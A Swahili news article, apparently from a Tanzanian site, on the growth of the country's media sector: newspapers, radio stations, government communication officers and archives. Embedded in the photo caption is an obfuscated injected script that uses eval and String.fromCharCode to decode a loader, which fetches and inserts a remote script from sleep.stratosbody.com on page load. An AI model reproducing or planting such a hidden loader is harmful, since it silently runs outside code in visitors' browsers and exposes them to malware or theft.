Recent Comments

Kuwepo kwa mabadiliko sekta ya habari ni hazina kwa Taifa

By Baraka Bitariho Sep 10, 2015
<p>Waziri wa Habari, Vijana, Utamaduni na Michezo, Dk Fenella Mukangara akitoa neno la shukrani wakati wa makabidhiano ya gari la matangazo, "OB Van" kutoka Serikali ya Jamhuri ya Watu wa China kwa ajili ya matumizi ya shirika la utangazaji, Tanzania (TBC).</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

SEKTA ya habari ni moja ya sekta za huduma za jamii inayotoa huduma ambayo ni haki ya msingi ya raia kama ilivyotamkwa kwenye Katiba ya Jamhuri ya Muungano wa Tanzania ya mwaka 1977.

Ibara ya 18 (2) ya Katiba inasema kuwa kila raia anayo haki ya kupewa taarifa wakati wowote kuhusu matukio mbalimbali nchini na duniani kote ambayo ni muhimu kwa maisha na shughuli za wananchi na pia juu ya masuala muhimu kwa jamii. Suala la kutafuta na kupewa habari kunatambuliwa duniani kote kuwa ni moja ya haki za binadamu. Haki hiyo kama zilivyo haki nyingine zote hutolewa kwa kuzingatia wajibu wa kila raia kwa jamii na uhuru binafsi wa binadamu.

Dhima ya sekta ya habari katika jamii ni kutoa habari, kuelimisha na kuburudisha. Sekta hii inahudumiwa na vyombo vya habari ambavyo ni redio, magazeti, majarida, televisheni, filamu, video, tovuti, intaneti, picha na machapisho kama vipeperushi, katuni, na mabango. Kasi ya upatikanaji na usambazaji wa habari imetokana na maendeleo ya teknolojia ya mawasiliano na hivyo kurahisisha dhana ya kupashana habari kwa wakati kadhalika kuifanya sekta ya habari kukua kwa kasi na kutumiwa na watu wa rika na mazingira mbalimbali.

Kutokana na kasi ya ukuaji wa sekta ya habari, idadi ya magazeti ya kila siku imeongezeka kutoka mawili mwaka 1992 hadi 14 mwaka 2015. Pia idadi ya magazeti ya kila wiki imeongezeka kutoka matano mwaka 1992 hadi 13 mwaka 2015. Idadi ya vituo vya redio Tanzania Bara imeongezeka kutoka kimoja mwaka 1992 hadi vituo 114 mwaka 2015. Pia vituo vya televisheni navyo vimeongezeka hadi 28.

Baadhi mamlaka za Serikali za Mitaa zimeanzisha vituo vya televisheni na redio kwa lengo la kujenga ukaribu na wananchi na kurahisisha upatikanaji wa taarifa kwa wakati ili kutoa haki ya upatikanaji wa habari kwa kila raia. Serikali ya Awamu ya Nne itakumbukwa kwa mengi ikiwemo utekelezaji na uboreshaji wa Vitengo vya Mawasiliano Serikalini. Vitengo hivi vimeboreshwa na kutoa fursa kwa maofisa Mawasiliano kuwa kiungo muhimu kati ya serikali na wananchi katika masuala yote yanayohusu upatikanaji wa habari.

Serikali imeendelea kuajiri maofisa Mawasiliano na kuboresha Sehemu ya Uratibu wa Vitengo vya Mawasiliano serikalini ili kusimamia na kuratibu shughuli za Mawasiliano ya Serikalini na Wasemaji wa taasisi za Serikali katika ngazi ya Wizara, Sekretarieti za Mikoa, Serikali za Mitaa, Idara zinazojitegemea na Wakala za Serikali. Takwimu kutoka katika Ripoti ya mafanikio ya Sekta ya Habari ya mwaka 2014 zinaonesha kuwa hadi kufikia mwezi Juni, 2014 maofisa Mawasiliano 302 wameajiriwa katika wizara na taasisi mbalimbali za Serikali ukilinganisha na maofisa Mawasiliano 47 mwezi Juni, 2005. Ongezeko hilo sawa na asilimia 542.

Ili kulinda weledi katika utendaji kazi wa kila siku, Serikali imekuwa ikiandaa programu mbalimbali za mafunzo kwa maofisa Mawasiliano ambayo hufanyika kila mwaka wakati wa vikao kazi vinavyowakutanisha maofisa Mawasiliano wote nchini. Pia Serikali imeanzisha Tovuti ya Wananchi kwa ajili ya wananchi kuwasiliana na Serikali moja kwa moja. Kupitia Tovuti hii maswali, kero, maoni na hoja mbalimbali kuhusu utekelezaji wa shughuli za Serikali na Utumishi wa Umma kwa jumla, zimekuwa zikitumwa na Serikali kutoa mwitikio kupitia tovuti hii.

Akizungumzia Tovuti ya Wananchi, Ofisa Habari kutoka Idara ya Habari Maelezo Husein Makame anasema kuwa Tovuti hii ilianza kazi tarehe 1 Julai, 2007. Hadi kufikia Machi, 2013, Tovuti hiyo imepokea jumla ya hoja 117,243 na kati ya hizo 78,258 zimeshughulikiwa na kupatiwa ufumbuzi. Hata hivyo, hoja 38,985 hazikuihusu serikali, ziliingia katika tovuti kwa makosa.

Serikali kupitia Wizara ya Habari, Vijana Utamaduni na Michezo imehakikisha kuwa vyombo vya habari nchini vinaendelea kuwa huru kupokea na kutoa habari za matukio mbalimbali yanayojitokeza katika jamii. Kadhalika kuzingatia maadili ya taaluma ya uandishi wa habari. Uhuru wa vyombo vya habari umeiwezesha Wizara kusajili magazeti na majarida 357 kwa kipindi cha kati ya mwaka 2005 hadi 2015 ikilinganishwa na magazeti 505 yaliyosajiliwa tangu tupate Uhuru mwaka 1961 hadi 2005.

Hali hii imewezesha kufanya magazeti yaliyosajiliwa nchini hadi sasa kuwa 862. Aidha, ripoti ya mafanikio ya sekta ya habari ya mwaka 2014 inaonyesha kuwa Idara ya Habari imekua ikihifadhi picha za matukio mbalimbali ya kitaifa tokea enzi ya Ukoloni wa Waingereza hadi sasa. Maktaba hiyo ya picha imehifadhi zaidi ya picha milioni 2.5 pamoja na “negatives” zake ambapo picha hizo zimehifadhiwa katika mfumo wa kidijiti ili kurahisisha upatikanaji, utumiaji na utunzaji wake.

Uhifadhi picha katika mfumo wa kidijiti unaiwezesha wizara kuendana na teknolojia ya kisasa na pia unaondoa uharibifu wowote unaoweza kutokea kama vile majanga ya moto, maji na mengine ya asili ambayo yangeweza kuharibu kabisa hazina hii muhimu ya taifa. Kwa upande wa maudhui ya vipindi vinavyorushwa katika televisheni na redio, Kamati ya Maudhui kwa kushirikiana na wadau wa sekta ya utangazaji imeandaa maboresho ya kanuni za utangazaji.

Pia kamati hiyo imeandaa mwongozo ambao utasaidia kuboresha matangazo ya biashara yenye kuzingatia maadili na weledi katika sekta ya utangazaji. Sekta ya habari, imeweza kuendana na mabadiliko ya teknolojia kwa kuhama kutoka katika mfumo wa utangazaji wa analoji kwenda mfumo wa dijiti. Pamoja na faida nyingine, Mfumo wa dijiti umeongeza ubora wa picha, sauti na matumizi ya masafa ya utangazaji.

Mabadiliko ya kisiasa, kiuchumi na kijamii yanayotokea nchini yameathiri utekelezaji wa Sheria inayosimamia Sekta ya Habari nchini. Hali hii imeilazimu Serikali kuanza mchakato wa kutunga Sheria mpya ya Kusimamia Vyombo vya Habari.

Mchakato wa kutunga Sheria hii unaendelea kwa kushirikisha wadau mbalimbali ikiwa ni pamoja na Wamiliki na Waendeshaji wa vyombo vya habari pamoja na Sekta binafsi. Sekta ya habari ni nyezo muhimu inategemewa na jamii, kwani hutoa fursa kwa jamii kupata taarifa ya mambo yanayowahusu na yanayoendelea duniani na kuiwezesha kufanya maamuzi ya maendeleo yao kutokana na kuwa na taarifa za masuala ya kijamii, kiuchumi, kisiasa na kiteknolojia.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com